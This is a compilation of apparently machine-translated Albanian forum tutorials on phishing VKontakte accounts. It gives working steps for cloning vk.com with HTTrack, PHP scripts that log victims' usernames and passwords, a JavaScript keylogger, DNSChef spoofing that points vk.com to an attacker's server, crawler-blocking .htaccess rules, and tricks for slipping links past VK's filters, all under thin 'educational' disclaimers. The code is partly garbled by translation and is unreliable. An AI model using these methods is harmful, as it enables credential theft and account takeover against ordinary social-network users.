Disa vite më parë, metoda e phishing ishte shumë e popullarizuar, por tani shërbimet kanë mësuar ta zbulojnë atë, ata gjejnë dhe bllokojnë faqe false. Prandaj, ekziston një metodë më e avancuar e phishing.
Sot shumë njerëz përdorin rrjetet sociale, çdo ditë njerëzit përpiqen të hakojnë llogarinë e dikujt Vkontakte, mail.ru, gmail dhe shërbime të tjera, dhe e bëjnë atë falas. Më shpesh sesa jo, njerëzit kërkojnë një aplikacion magjik për të hakuar Vkontakte, por ne do t'ju tregojmë diçka tjetër. Ky është phishing. Por në këtë artikull (ndryshe nga ai i mëparshmi), ne do të shqyrtojmë një version alternativ të tij.
Riemërtoni skedarin index.html në skedarin vk.jpg, kjo është e nevojshme për të ngatërruar sistemin e sigurisë Vkontakte;
Krijoni një skedar bosh të quajtur security.php, hapeni në notepad, futni kodin e mëposhtëm
$ id = $ _MERRNI ["kodin"];
nëse ($ id == "konfirmo postën") (
$ myFile = "vk.jpg";
$ fh = fopen ($ myFile, "r");
$ theData = fread ($ fh, 500000); fclose ($ fh);
$ myFile1 = "konfirmo.jpg";
$ fh1 = fopen ($ myFile1, "r");
$ theData1 = fread ($ fh1, 500000);
echo $ theData1; )
dhe ruajeni pranë vk.jpg;
Krijoni një skedar confirm.jpg, hapeni gjithashtu në notepad dhe futni rreshtin e mëposhtëm në të:
faleminderit për konfirmimin e adresës tuaj të emailit.
ruaj;
Sigurohuni që të keni skedarët që ju nevojiten
dhe një dosje me të gjitha skriptet Vkontakte, pa to faqja juaj e rreme do të shfaqet gabimisht;
Ngarkoni këto skedarë në hostin tuaj të internetit;
Kjo metodë është gjithashtu e përshtatshme nëse viktima hyn nga një pajisje android. Dhe me një grup skriptesh, mund të hakoni një numër të madh llogarish në Vkontakte. Përveç kostove të pritjes, kjo është një mënyrë falas për të marrë një fjalëkalim.
Kjo është vetëm një metodë për të kaluar përmes sistemeve të sigurisë të një rrjeti social ose shërbimi email. Por sot, për të hakuar Vkontakte, duhet të dini shumë metoda të tilla. Mekanizmat anti-phishing po përmirësohen çdo ditë dhe pronarët e shërbimeve po shtrëngojnë gjithnjë e më shumë vidhat, duke mos lënë zbrazëti për hakerat. Por forca e metodës së hakimit qëndron në një tjetër. Domethënë, në manipulimin e aftë të njerëzve, aftësia për të identifikuar dhe përdorur dobësitë e tyre. Shkrimi i një faqeje të mirë të parë nuk është as gjysma e betejës, sepse nëse nuk keni aftësi të mjaftueshme inxhinierike sociale, atëherë thjesht nuk ka kuptim ta bëni këtë.
Përshëndetje, banorë të forumit! Sot do të flasim për phishing Vkontakte. Para së gjithash, dua të them që artikulli përmend disa shërbime, mos e konsideroni si reklamë. Artikulli është shkruar për qëllime informative dhe unë nuk po inkurajoj askënd që të ndërmarrë veprimet e përshkruara në artikull.
Siç e dini, VK phishing ishte shumë i popullarizuar, por pas përditësimit të VKontakte, politika e sigurisë filloi të shteronte vetveten. A është me të vërtetë? Në fund të fundit, asgjë nuk qëndron ende, dhe me politikën e re të sigurisë kanë ardhur metoda të reja të phishing.
Në këtë artikull do t'ju tregoj pak për "problemet" e sitit të peshkut VK dhe zgjidhjet e tyre duke përdorur shembullin e një siti të shkrirë prej kohësh në një publik. (Burimet mund të shkarkohen këtu: Ya.Disk
Cila është gjëja e parë që ju bie në sy kur hapni një faqe të tillë?
- Pamje e dyshimtë: faqja duket si një version i vjetër celular i VK, ndërrimi i gjuhës nuk funksionon, shkronjat e vjetra dhe një logo me pikselë sugjerojnë menjëherë se jemi në një faqe me qëllim të keq.
- Mungesa e një versioni desktop të faqes: po, e kuptoj që 80% e trafikut VK vjen nga pajisjet celulare, por gjithsesi, duhet të jeni gati për gjithçka, veçanërisht nëse jeni të përfshirë në hakim individual.
- Faqe të tilla janë shënuar menjëherë nga shfletuesit si "mashtruese": fakti është se shfletuesi para së gjithash shikon certifikatën SSL ose mungesën e saj, e kështu me radhë. phishers kryesisht vendosin faqet e peshkut në pritje falas, atëherë nuk ka të paktën një certifikatë DV SSL atje. faqet janë shënuar si "mashtruese", dhe më pas llogaria e pritjes është e ndaluar.
- Mungesa e plotë e vërtetimit të të dhënave: gjithçka që kam parë në skriptet e tilla është në thelb një formë me fushat "login", "password", një buton dhe një regjistrim të këtyre gjërave në një bllok shënimesh. Asnjë kontroll vërtetimi, fusha boshe ose BadRequest ... Nuk po flas as për të punuar me llogaritë 2FA. Maksimumi - një kërkesë për API-në VK për të marrë një shenjë.
- Dërgimi i mesazheve që përmban një lidhje me një faqe phishing: kur dërgon mesazhe, teksti ishte diçka e tillë: "O zot, ti fitove konkursin e ripostimit, ndiq lidhjen
Duhet të jeni të regjistruar për të parë lidhjet.
Dhe merrni 100,500 dollarë. "Epo, duhet ta pranoni se tingëllon budallallëk. Por po, kjo është ende duke u bërë...kanë mbetur shumë pak njerëz të tillë naivë, dhe kryesisht fëmijë.
- Shkurtimi i lidhjeve: në mënyrë që VK të kapërcejë lidhjet në faqet e peshkut, duhet të bëni një ridrejtim + reduktim, si rezultat, lidhja doli të ishte si
Duhet të jeni të regjistruar për të parë lidhjet.
Kjo vetëm sa prishi pamjen e mesazhit.
Shkurtimi i lidhjeve
Siç bëra kur sapo isha duke mësuar phishing: krijova një sajt në uCoz, në redaktuesin e faqeve HTML shtova një skript që ridrejtohej në një sajt peshku. Pastaj futa URL-në e faqes në vk.cc dhe mora një lidhje të gatshme, të cilën VK e kaloi. Si të shmangni këtë marrëzi? Është shumë e thjeshtë. Ka dy mënyra:
- Ne nuk do të shkurtojmë lidhjet nga vk.cc, por do të mashtrojmë pak me uCoz. (Nëse jeni duke përdorur një faqe sondazhi si një sajt sondazhi, kjo është përgjithësisht e mrekullueshme)
- Merrni një certifikatë SSL për domenin tuaj.
Spoiler: Mashtrim me uCoz
Ne do të krijojmë çdo sajt me një emër që përputhet me temën tuaj të faqes së shtrimit
Le të shkojmë te skeda Modulet dhe të krijojmë një faqe në internet
Le ta quajmë disi, do ta quaj "test", nëse keni një faqe-laying si votë, mund ta emërtoni faqen "golos-za-ivana-pupkina"
Tani le të shkojmë në faqen tonë, pastaj në skedën "test" që sapo krijuam dhe kopjoni URL-në diku
Le të shkojmë te seksioni Dizajn => Redaktori => Faqet e faqes ... dhe ndërmjet
futni rreshtat e mëposhtëm:
Si rezultat, duke ndjekur lidhjen
Duhet të jeni të regjistruar për të parë lidhjet.
Ne do të transferohemi në faqen që na nevojitet. Tani nuk ka nevojë të shkurtoni lidhje të tilla përmes vk.cc. VK do t'i kalojë ato pa asnjë problem, dhe kur i dërgojmë ne do të privojmë veten nga pyetjet nga marrësi "Oh, një lloj lidhjeje të dyshimtë ... a nuk është padyshim një mashtrim?"
Marrja e një certifikate SSL
Siç thashë, nevojitet një çertifikatë SSL në mënyrë që shfletuesit dhe antiviruset të mos e shënojnë faqen tonë të phishing si "mashtruese". Për më tepër, lidhjet në një sit me SSL anashkalohen nga VK, që do të thotë se manipulimet e përshkruara më lart nuk do të nevojiten, thjesht mund ta heqim lidhjen në formën e tij origjinale.
Spoiler: Ne marrim një certifikatë SSL
Për momentin, ka shumë faqe pritëse që punojnë me autoritetet e certifikimit. Zgjidhja më e thjeshtë për problemin me SSL është vendosja e faqeve tuaja, vetëm në një pritje të tillë. Paneli i tyre i kontrollit tashmë ka një skedë me menaxhimin SSL, ku mund të porosisni një certifikatë të re, të instaloni tuajën ose të menaxhoni certifikatat ekzistuese.
Gjithashtu, për të reduktuar mundësinë e bllokimit të një sajti të shënuar si mashtrues, mund të përshkruani në skedarin .htaccess një ndalim të indeksimit nga robotët e motorëve të kërkimit.
Spoiler: Çfarë të shtoni në .htaccess
SetEnvIfNoCase User-Agent "^ Googlebot" search_bot
SetEnvIfNoCase User-Agent "^ Yandex" search_bot
SetEnvIfNoCase User-Agent "^ Yahoo" search_bot
SetEnvIfNoCase User-Agent "^ Aport" search_bot
SetEnvIfNoCase User-Agent "^ msnbot" search_bot
SetEnvIfNoCase User-Agent "^ spider" search_bot
SetEnvIfNoCase User-Agent "^ Robot" search_bot
SetEnvIfNoCase User-Agent "^ php" search_bot
SetEnvIfNoCase User-Agent "^ Mail" search_bot
SetEnvIfNoCase User-Agent "^ bot" search_bot
SetEnvIfNoCase User-Agent "^ igdeSpyder" search_bot
SetEnvIfNoCase User-Agent "^ Snapbot" search_bot
SetEnvIfNoCase User-Agent "^ WordPress" search_bot
SetEnvIfNoCase User-Agent "^ BlogPulseLive" search_bot
SetEnvIfNoCase User-Agent "^ Parser" search_bot
Epo, kjo është e gjitha për momentin. Unë kam ende shumë informacione për VK-në, kështu që nëse dikush dëshiron të diskutojë phishing në VK, të bëjë një pyetje ose ndonjë gjë tjetër, ju lutemi shkoni te LAN-i i forumit. Gjithmonë i hapur ndaj ideve të reja. Shpresoj se ky informacion ishte i dobishëm për ju;)
Në këtë artikull, komanda HelpU, do të përshkruajë në detaje skemën e phishing për llogaritë e një rrjeti social të njohur Në kontakt me.
Pra, le të shkojmë.
Për punë na duhen Kali Linux versioni më i fundit, i cili është për momentin, si dhe njohuritë për të, kemi shkruar më herët. Por për faqen VK, ne do të përshkruajmë gjithçka individualisht.
Pra, ne marrim sitin: vk.com. Në këtë fazë, gjithçka nuk është e vështirë, thjesht mund të kopjoni. Por vetëm një gjë, nëse thjesht kopjoni kodin burimor të faqes, ne marrim një "papastërti" të tillë:
Mjaft e paparaqitshme...
Ne do të klonojmë faqen, ose më mirë faqen e saj të mirëseardhjes. Për këtë ne do të përdorim. Në fakt, ky program është unik, ai mund të kopjojë të gjithë faqen dhe pjesët e tij individuale.
Mënyra më e lehtë për të ekzekutuar këtë program do të duket diçka si kjo:
Httrack vk.com -O / var / www / html
Por për VK ne nuk e rekomandojmë ta bëni këtë, sepse kopjoni të gjithë VK, jo ideja më e zgjuar. Kjo shpesh bëhet në sajte më të vogla për një analizë të plotë të strukturës së të gjitha dosjeve dhe skedarëve. Por në këtë fazë, ne do të veprojmë sipas një skenari tjetër.
Së pari, duhet të përdorni një parametër për të futur një agjent përdoruesi.
Prandaj, ne do të përdorim parametrin:
F Mozilla / 5.0 (Windows NT 6.1) ApleWebKit / 537.36 (KHTML, si Gecko) Chrome / 41.0.228.0 Safari / 537.36
Httrack https://vk.com -r2 -F Mozilla / 5.0 (Windows NT 6.1) AppleWebKit / 537.36 (KHTML, si Gecko) Chrome / 41.0.228.0 Safari / 537.36 -O "/var/www/html/vk.com "
Pas kësaj do të shohim:
Faqja do të kopjohet. Në dosje vk.com do të ketë disa skedarë që kam bërë, mund t'i fshini dhe të lini vetëm një dosje vk.com
Fshini, zhvendosni skedarët nga një nënfolder vk.com në dosje vk.com më lart, dhe atëherë nuk do të kemi shtegun në shiritin e adresave: localhost / vk.com / vk.com
Pas manipulimit të skedarëve, adresa do të jetë: localhost / vk.com
Gjithçka është e qartë me versionin në internet. Por nëse përpiqeni të kopjoni versionin celular të VKontakte ( m.vk.com), do të ketë disa vështirësi, atje javascript kontrollon vlefshmërinë e adresës dhe parandalon ngarkimin e faqes. Por edhe kjo ka cenueshmërinë e vet.
Komanda do të jetë si më poshtë:
Httrack https://m.vk.com -r2 -F "Mozilla / 5.0 (Linux; U; Android 4.0.3; ru-ru; LG-L160L Build / IML74K) AppleWebkit / 999 + (KHTML, si Gecko) Safari /999.9 "-O" / var / www / html / mvk / "
Kur faqja kopjohet dhe ju përpiqeni të hyni në të, asgjë nuk do të vijë prej saj, kështu që duhet të ekzekutoni komandën e mëposhtme:
Nano /var/www/html/mvk/m.vk.com/index.html
Zgjidhni rreshtin që theksohet në pamjen e ekranit dhe fshijeni atë.
Dhe faqja funksionon shkëlqyeshëm.
Pra, ne kemi faqe që janë identike me origjinalin. Por regjistrat nuk ruhen askund dhe ne nuk do të jemi në gjendje të shohim se kush çfarë ka hedhur në fusha, kështu që le të fillojmë programimin në ueb. Ne do të zbatojmë në faqen tonë keylogger, do ta shkruajmë në php dhe javascript.
Krijo 3 skedarë keylogger.php, keylogger.js dhe keylog.txt
V keylogger.php prezantojmë:
çelësi $ = $ _ POST ["çelës"];$ logfile = "keylog.txt";
$ fp = fopen ($ log file, "a");
fwrite ($ fp, çelësi $);
fclose ($ fp);
?>
V keyloger.js prezantojmë:
Document.onkeypres = funksion (evt) (evt = evt || çelësi window.evnt = String.fromCharode (evt.charode) if (çelës) (var http = i ri XMLHtpRequest (); var parm = encodeURI (çelës) http.open ("POST", "keylogger.php", e vërtetë); http.setReqestHeder ("Contnt-type", "application / x-ww-form-urlenoded"); http.send ("key =" + parm);) )
në tonë indeks.php ju duhet të shtoni rreshtin:
Mbaroi, mbaruam keylogger.
Tani le të fillojmë redaktimin indeks.php: në kërkim të linjës " Identifikohu"Dhe kërkoni parametrin onclick = 'top.showBox'(ndryshoni adresën në https://vk.com)
Pas kësaj, kur shtypni butonin Identifikohu përdoruesi do të drejtohet në faqen zyrtare Në kontakt me.
Ne hyjmë përmes SSH në VPS.
# wget htps: //thesprwl.org/media/projcts/dnscef-0.3.zip # unzip dnscef-0.3.zip # cd dnshef * # chod 755 * .py
Zgjidhja më e mirë do të ishte që është më mirë të vendosni parametrat e mëposhtëm këtu:
# pi instaloni dnslib # pi instaloni IPy
Krijo një skedar: hostet.txt
Ne shkruajmë në të sa vijon:
(Url faqe, në rastin tonë vk.com = IP_YOUR_VPS)
Duke përshkruar komandën e mëposhtme, ne do të ekzekutojmë gjithçka:
./dnschf.py -i 0.0.0.0 --logfle = log.txt --file = hosts.txt
U krye, e juaja DNS punon me sukses. Ai na kthen adresat tona.
Kjo është e gjitha, shpresojmë se ky artikull ishte i dobishëm për ju.
Përshëndetje, ekip HelpU.
Mohimi i përgjegjësisë: Ky artikull është shkruar vetëm për qëllime edukative. Autori ose botuesi nuk e ka publikuar këtë artikull për qëllime keqdashëse. Nëse lexuesit dëshirojnë ta përdorin informacionin për përfitime personale, atëherë autori dhe botuesi nuk janë përgjegjës për ndonjë dëm ose dëm të shkaktuar.Në këtë artikull do t'ju tregoj se çfarë është phishing VKontakte. Si të mos kapeni në një faqe phishing dhe të mos digjni kredencialet tuaja. Unë gjithashtu do të jap një shembull të krijimit të një siti të tillë.
Çfarë është phishing?
Në përgjithësi, fjala peshkim përkthehet si peshkim. Phishing është një mashtrim i një faqe interneti ku përdoruesit futin kredencialet e tyre, si "login" dhe "password" dhe më pas ridrejtohen në faqen zyrtare në mënyrë që të mos ketë dyshime. Një person i keq "rrepkë" njeh kredencialet tuaja dhe mund të hyjë në sajt nën emrin tuaj të përdoruesit.
Jini të vëmendshëm
Si mund ta rrëshqitni një faqe të tillë, ka disa shembuj.
- Në çdo burim mund të ketë një lidhje që thotë: "më shto si mik dhe merr 10 vota VKontakte për këtë". Dakord, joshëse? Viktima ndjek këtë lidhje, hyn në një sit që duket se nuk është i ndryshëm nga faqja e VKontakte, fut një "hyrje" dhe "fjalëkalim". Hyn në faqen e tij, nuk kishte më vota. Ai mendon për një kohë të gjatë dhe në fund shënon për këtë çështje, dhe të dhënat nga llogaria janë tashmë në "rrepkë".
- E dashura ose i dashuri ju jep një lidhje në faqen, me pretekstin si Cat =) Ju, pa u menduar, ndiqni lidhjen, shkruani "login" dhe "password". Dhe personi juaj i rëndësishëm tani i di kredencialet tuaja dhe do të jetë në gjendje të shohë se me kë po dërgoni mesazhe =)
Dhe ka shumë mundësi të tjera se si të joshni një viktimë në një sit të tillë.
Shihni ku po shkoni, nëse jeni aktualisht në një kontakt dhe ju jepet një link, klikoni mbi të, shihni faqen e autorizimit, duhet të keni menjëherë dyshime. Kushtojini vëmendje adresës së faqes së internetit. Le të themi VKontakte, adresa e tij: vk.com ose vkontakte.ru. Jo shumë njerëz mund të mbajnë mend emrat e gjatë të domeneve të faqeve të internetit, ata janë më të lehtët për tu falsifikuar. Unë mendoj se për shkak të kësaj rrjeti social VKontakte kaloi në një adresë kaq të shkurtër domeni sa do të ishte më e vështirë ta falsifikoje. Nëse shihni adresën vk.org, atëherë me të vërtetë nuk do të shihni një kapje, nëse shkruani diçka pas saj, për shembull: kështu, në përgjithësi, një adresë si adresë. Epo, nëse ju kërkohet të vendosni një fjalëkalim diku, kontrolloni me kujdes adresën e domenit.
Krijimi i një faqeje phishing
Ky material ofrohet thjesht për qëllime informative, dhe jo për të thyer llogaritë e të njohurve dhe miqve tuaj, gjithashtu mos harroni se kjo është një çështje penale.
Dhe kështu unë do të jap një shembull të krijimit të një siti phishing për rrjetin social VKontakte.
Hapni çdo shfletues, shkoni te vk.com,
Emri i skedarit: index.html
Lloji i skedarit: Uebfaqe, plotësisht me foto. Shtypim butonin, Ruaj.
Tani ju duhet të krijoni një skript që do të transmetojë të dhënat e futura në fushën e hyrjes dhe fjalëkalimit. Le ta quajmë icq.php
Hapni bllokun e shënimeve dhe ngjisni këtë kod atje.
$ Hyrja = $ _POST; // Hyrja e viktimës
$ Pass = $ _POST [‘zena’]; // Fjalëkalimi i viktimës
$ log = fopen ("ups.php", "a +"); // fjalëkalimet e viktimave do të jenë këtu
fwrite ($ log, "
$ Identifikohu: $ Pass \ n ”); // shkruani në ups.phpfclose ($ log); // mbyllje.php
jehonë”
”; // ridrejtoni viktimën në http://vk.com
Mbyllni dhe ruajeni si icq.php
Hapni skedarin index.html në bllokun e shënimeve. Hapni kërkimin (ctrl + f) dhe futni
